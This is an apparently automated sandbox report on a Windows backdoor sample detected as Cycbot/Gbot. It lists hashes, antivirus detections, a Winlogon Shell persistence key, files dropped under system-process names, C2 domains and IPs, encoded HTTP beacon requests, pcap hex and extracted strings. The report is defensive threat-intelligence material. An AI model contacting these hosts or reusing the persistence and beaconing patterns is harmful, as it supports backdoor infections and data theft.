Analysis Date2014-12-17 22:18:30
MD50a60689e923c25ac2565928669e40826
SHA1e7d4090ac5b4b12db3f6a89c91d27078802afc05

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: b36323d4fde6ddecf78c1bee5ef6fe09 sha1: 92a0f08325b6cb955d0ed534e9ed40710eb4bc4d size: 115200
Section.rdata md5: f68891f4b028a24dddad01209547dce3 sha1: 1203c0c4d370156cff0f1295d67dcce91af3d57d size: 1536
Section.data md5: 7eb434bb9a88d54588dd191d02405111 sha1: 8690072a48ae66d6d5dfd9bc3fbf40899965aa7c size: 68608
Section.reloc md5: 78131b8265419cd19923de34e4d59e94 sha1: 26723ba7d07abe1c716ab21a2fef9b99952e1940 size: 1024
Timestamp2005-10-02 05:51:49
PEhashf4229382f692e5af0c97363ac0fdd4caf0ababa6
IMPhash6597540d6fb824b27a61c2f955b6bb18
AV360 SafeGen:Variant.Kazy.38139
AVAd-AwareGen:Variant.Kazy.38139
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)Gen:Variant.Kazy.38139
AVAuthentiumW32/Goolbot.K.gen!Eldorado
AVAvira (antivir)TR/Crypt.ZPACK.Gen
AVBullGuardGen:Variant.Kazy.38139
AVCA (E-Trust Ino)Win32/Cycbot.G!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVTrojan.Gbot-470
AVDr. WebTrojan.DownLoader4.61209
AVEmsisoftGen:Variant.Kazy.38139
AVEset (nod32)Win32/Kryptik.SZU
AVFortinetW32/Gbot.IS!tr.bdr
AVFrisk (f-prot)W32/Goolbot.K.gen!Eldorado
AVF-SecureGen:Variant.Kazy.38139
AVGrisoft (avg)Win32/Cryptor
AVIkarusVirus.Win32.Cryptor
AVK7Backdoor ( 003210941 )
AVKasperskyBackdoor.Win32.Gbot.oho
AVMalwareBytesBackdoor.Bot
AVMcafeeBackDoor-EXI.gen.r
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Variant.Kazy.38139
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Trojan
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Backdoor.Gbot

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝
explorer.exe,C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{45BCA615-C82A-4152-8857-BCC626AE4C8D}
Creates Mutex{5A92A751-F926-4BB9-872E-BEC4A4CD571F}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS127.0.0.1
Winsock DNSyourmediaresources.com
Winsock DNScrazyleafdesign.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Network Details:

DNScrazyleafdesign.com
Type: A
199.201.88.112
DNSzonedg.com
Type: A
141.8.225.80
DNSzonedg.com
Type: A
141.8.225.80
DNSyourmediaresources.com
Type: A
HTTP GEThttp://crazyleafdesign.com/blog/images/share/stumble.png?v25=82&tq=gJ4WK%2FSUh4TDhRMw9YLJiMSTUivqg4aExZNSK%2B%2FbxWq1SfkIYXB6
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSvT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8yjYvEaSPT%2BsqtSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
HTTP POSThttp://zonedg.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfVsSvT5wug%2BtygfvO7H33Hhbj%2Fh7sbedf1sSvT8t65i9hlL9PmxqXH0bF%2FmiMWrdPd5SOeikL50gB9K5PLNq3eFGjzh%2F8DdAYdrT5WO0alxtygbpb6HvnSAOQij%2B8OoYvEaSPT%2BsqlSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 199.201.88.112:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1036 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f626c6f 672f696d 61676573   GET /blog/images
0x00000010 (00016)   2f736861 72652f73 74756d62 6c652e70   /share/stumble.p
0x00000020 (00032)   6e673f76 32353d38 32267471 3d674a34   ng?v25=82&tq=gJ4
0x00000030 (00048)   574b2532 46535568 34544468 524d7739   WK%2FSUh4TDhRMw9
0x00000040 (00064)   594c4a69 4d535455 69767167 34614578   YLJiMSTUivqg4aEx
0x00000050 (00080)   5a4e534b 25324225 32466278 57713153   ZNSK%2B%2FbxWq1S
0x00000060 (00096)   666b4959 58423620 48545450 2f312e30   fkIYXB6 HTTP/1.0
0x00000070 (00112)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000080 (00128)   6f73650d 0a486f73 743a2063 72617a79   ose..Host: crazy
0x00000090 (00144)   6c656166 64657369 676e2e63 6f6d0d0a   leafdesign.com..
0x000000a0 (00160)   41636365 70743a20 2a2f2a0d 0a557365   Accept: */*..Use
0x000000b0 (00176)   722d4167 656e743a 206d6f7a 696c6c61   r-Agent: mozilla
0x000000c0 (00192)   2f322e30 0d0a0d0a                     /2.0....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53765425   ij%2B8yjYvEaSvT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 4238796a 59764561 53505425   ij%2B8yjYvEaSPT%
0x000000c0 (00192)   32427371 74537225 32466525 32425635   2BsqtSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   56735376 54357775 67253242 74796766   VsSvT5wug%2Btygf
0x00000040 (00064)   764f3748 33334868 626a2532 46683773   vO7H33Hhbj%2Fh7s
0x00000050 (00080)   62656466 31735376 54387436 35693968   bedf1sSvT8t65i9h
0x00000060 (00096)   6c4c3950 6d787158 48306246 2532466d   lL9PmxqXH0bF%2Fm
0x00000070 (00112)   694d5772 64506435 534f6569 6b4c3530   iMWrdPd5SOeikL50
0x00000080 (00128)   6742394b 35504c4e 71336546 476a7a68   gB9K5PLNq3eFGjzh
0x00000090 (00144)   25324638 44644159 64725435 574f3061   %2F8DdAYdrT5WO0a
0x000000a0 (00160)   6c787479 67627062 3648766e 53414f51   lxtygbpb6HvnSAOQ
0x000000b0 (00176)   696a2532 42384f6f 59764561 53505425   ij%2B8OoYvEaSPT%
0x000000c0 (00192)   32427371 6c537225 32466525 32425635   2BsqlSr%2Fe%2BV5
0x000000d0 (00208)   5a755267 25334425 33442048 5454502f   ZuRg%3D%3D HTTP/
0x000000e0 (00224)   312e310d 0a486f73 743a207a 6f6e6564   1.1..Host: zoned
0x000000f0 (00240)   672e636f 6d0d0a55 7365722d 4167656e   g.com..User-Agen
0x00000100 (00256)   743a206d 6f7a696c 6c612f32 2e300d0a   t: mozilla/2.0..
0x00000110 (00272)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x00000120 (00288)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000130 (00304)   6c6f7365 0d0a0d0a 20737563 68206669   lose.... such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
.
..
.@
o.
`@
j
..
.o..
{
.
(.
080904b0
1.0.0.1
1423
FileVersion
&find
&Find any        Alt+F
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
````````
`````````
~~~~~~~~~
~~~~~~~~~~~~~~~~
<<<<<<
|||||||
              
_____!
-%!!!!
,,,,,,,
,,,,,,,,
;;;;;;;;
!!!!!!!
''''''''
((((((((
))))))))
@@@@@@
@@@@@@@@@@
*''''''''
**********
%%%%%%
%%%%%%%%%
++++++++++++
						
!0"``'
00))))
03\.L*@
`09I97
0"p_N9
[0p$X]t8
1*@`0$ `
1111111111
&1^P	[
$1 X7<N
1XuAe!
1.Y(e!
2222222
2)3$`@
-2_h+:}
2:h2s'
	2@I1<X
 @2}#j
?"`@2k.  ~
/334$``
	"~3GE
4'11(`
4A&2CTA4
4OEk"o	
57P]1)
5cL,Fa
5@kt?O?
5lK2ZHme
\"5\m/E
+5+oB.'
|5W3E}
-.6t|z
  ,  7
7j29+Nu
7ynnDDDDDDDDDDDDDDDDDD````````
849}oDG
8=8&``[
	88888
888888888888
`$``:9
999999
?/%9:e
:9eM?w_
9mZF3/,
AAAA{{{{{{{{{{{{
&&&&&**aaaaa
/////+AAAAA
AAAAAAA
aaaaaaaaaa
aaaaaaaabvvvv
AAAAAKKKKKKK
AA{)))))FFFFFFFF:::::TT
A^^DDDDDD4444444444
_%|=aJ
alBB'p
`@aLG 
a.M![^,[B8f
AP{. `
(Av!dQ
%B,]%#
:B22MH
BBBBBBBBBBBBB
bbbbbbbbbbbbbbbbbbb
``{Bc~
BitBlt
b  @Tz
Bu/AKW
buNGBz
bzm]YR-A
  {}C&
cf8s<.
(C><^g
C&-] G"FX
C{@MI}g
:\co:#
cQb?@CU( 
`@, @Cr
CreateCompatibleDC
CreateFileA
d1?!+5
@.data
:/d)c$
DDDDDD
DDDDDDh
DdQ'EP
DD&RRRRRRttZZZ
;;<<<<\\\\\\\\\DDvvvvvvvvvvvv
DeleteCriticalSection
DeleteDC
]dhZ.`
D'	ls'
DuplicateHandle
{E~=1}+
	eAAAAAAAAAAAAAAAAAp
ebjR}A
EB=l}>?
>EcnKP
`e+D1(
^_eD%f
EDrB$)
EEEEEEEEEEEEEEEEE
/)ek+K
@ E~#R
eu#"``
E!v>6A
ExitProcess
{%?>F(
F0;d}jO
:fBx$@
'feiJ{
F!F5vs 
fffffff
&&&&&&&FFFFFFFF~~~
fL&{T@
FlushInstructionCache
Fmy|`W
FNv+<TBlW
``f"@@o
FormatMessageA
Fs\@zW^
(@`fw9HKw
&  g:	;
'G#39v
g}~:9C
@gEJsC
GetCommandLineA
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileSize
GetFileVersionInfoA
GetFileVersionInfoSizeA
GetLastError
GetObjectA
GetStartupInfoA
GetTempPathA
GetThreadContext
GetVersionExA
GetWindowsDirectoryA
==========gggg
GGGGG--
gggggg
GGGGGGG
ggggggggggggggWWWWWWW
G)H.%[
GlobalAlloc
GlobalFree
GlobalLock
GlobalUnlock
gPGJeC
gR*RL3
@ gSBm
 gU-aMY
gV!`x+
`gY&  
HeapAlloc
HeapFree
>>>HHHH
hhhhhhh
HHHHHHH
HHHHHHllQQQQQ~~~
hhhhhooooXXXXXXX
Hkmb @
{h_@sz
@@	|i+&
I1m:(:xm
i?fFK 
\iiiiii
iiiiiii
IIIIIIIIIIIIII
IIIIIIIIIIIIIIIIIIIIII
''''''''''IIIIIIIl
iM2Z|-wd
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
iwewaz
]Iy`Irn
.i Yt$
`J58Q<
J6.8?f%e8
-j8TA[ 
*  jc2
:j#!eX
JJJJJJJ))
JJJJJJJJJ
``JJJJJJJJJJ777777
,j?kip.
Jm'o@Y
j @ s6QU
(jv7gK
Jww1=.  !
j(YP	=ky
k!!!!!!!!!
@@[K);
k;4*fG
kb'IM0X
!	kD H{
KERNEL32.dll
!kj8NE
kkGGGGG
KKKKKKKKKKKKKK&&&&&&CXXXX
kkkqqqqqWWWWQ=
LLLGGG
lllll@@@@@
llQQQQQQQGGff
l mLci ``
LocalFree
#]L~RoK
 lvh[^
LWC=y-
m64egp0j
ma}yv* `
&|MDu?
MFFFFFF
$  MhP
MM]]]]]
MMMMMMM
M<n0C,  
mo^Yt!
mq6,` 0|
,]mS<0
MviTP/
MwQ{/_
~N @`5
n$`@9H
NdrByteCountPointerFree
_nl:rQ
NNNNNN\e
Ns5GW,t
Nt{w@#
O"@@ba
[oBck'
Ob!fTg
******oooooooooo111111
ooooooooooooooooBB
OwSqm;
+oZ, @_}
>PCF$@ 
 pcr!%
=Phj.`
P<-i(  v
@PMq+1
,`@P~O
P'OZ|,
ppppFFFF
PPPPPPP
ppppppppppp
PPPPPPzzzzzzzzzzzzz
pppUUU
`p^{TF
)P+zO"@`
Q0l>&q
q]{3	T
&q~4D2
qAA0ei
QChw}&
QJQg&``sIc
qqqqqqq
R3/g>GZ
RaiseException
`.rdata
RealizePalette
.reloc
` /r<G
rHtwP|
@`>Ri!
'r:iOGZ
%rMX_g
"robS)
ROesGN
RPCRT4.dll
RpcStringFreeA
RRRR      
rrrrrr
RRRRRR
rrrrrrrrrrrrrrrr
RtlUnwind
@`s8|M
s*@`Aj
SelectObject
SelectPalette
SetLastError
SetLocaleInfoW
SetMapMode
SFv0bT[
soF65?L
SSSSSS
StrDupA
StrDupW
StrFormatByteSizeEx
StrRChrA
StrRChrW
StrRetToBSTR
StrRetToBufW
StrRetToStrW
StrStrA
StrStrIA
StrStrIW
StrStrW
StrToInt64ExW
StrToIntA
StrToIntExW
StrToIntW
StrTrimW
suX0( 
sX{;4;=
SyJrGm
 @?	\T
}t|5h$w
>#T[80(
!This program cannot be run in DOS mode.
)TJ|Mb
TlsSetValue
TM9tprX
T/ppGCy
>T\Rzy
Tt<:~~
TTTT::::::::::
tttttt
TTTTTTT
TTTTTTTTT
ttttttttttttt
TTTTTTTTTTTTyyyy
tttvvvv
 u`?1p
}{`U;2
;u3pA>
=U9D>wS
  UhE\zl
UHJgLZ
uiZ:4|
UnrealizeObject
UrlApplySchemeA
UrlApplySchemeW
UrlCanonicalizeA
UrlCanonicalizeW
UrlCombineA
UrlCombineW
UrlEscapeA
UrlEscapeW
UrlGetPartW
UrlUnescapeA
UrlUnescapeW
UuidCreate
UuidToStringA
UUUUUUU~~~
UUUUUUUUU
UUUUUUUUUUUUU
UXE@)$
V-*  ~
vbd, `<
	v)be]X
VerQueryValueA
VERSION.dll
^]VGG?P+
@ VgOM(@
VirtualProtectEx
v"@ L?
v&`@P|
v+"``S
vvvvvvv
VVVVVVVVVVVVccccccccccccc
vwvnsprintfW
[<]w{4
WaitForSingleObject
%WB1Bcf
WgSH$P
<wiUE{Zv
wnsprintfA
wnsprintfW
`@WP-0
WriteProcessMemory
WT*2ji;H'
,WUnCq
wwwww----======================
wwwwwwww
(`@x" 
X@f0UG
XH\m>f
xiBtsxW+"  +
 `xI#P
xN'zEO
` X<Sg
xw5X6`
XXXXXX
XXXXXXXXX\\
"y0nM9
y5#^@q
y'AHk?
<yB3I)
@YCqg*
)?yGP7a)
yHxJDl
]y=>^j
YOK;?=s
YqVJo5
>YtKG 
'yV;fp,hk_
YYYYYY
YYYYYY``
Z6=E#AV
z`j>kr
z)mdW>?
&&zOA[
zt* `'=JTp(
 `^Zw'
 Z|X,`
Zx)e$@
z^~_xM
|z[Ynk
zzoooSSNNNN
ZZZZZ{{{{{{{
zzzzzzz
zzzzzzzzzz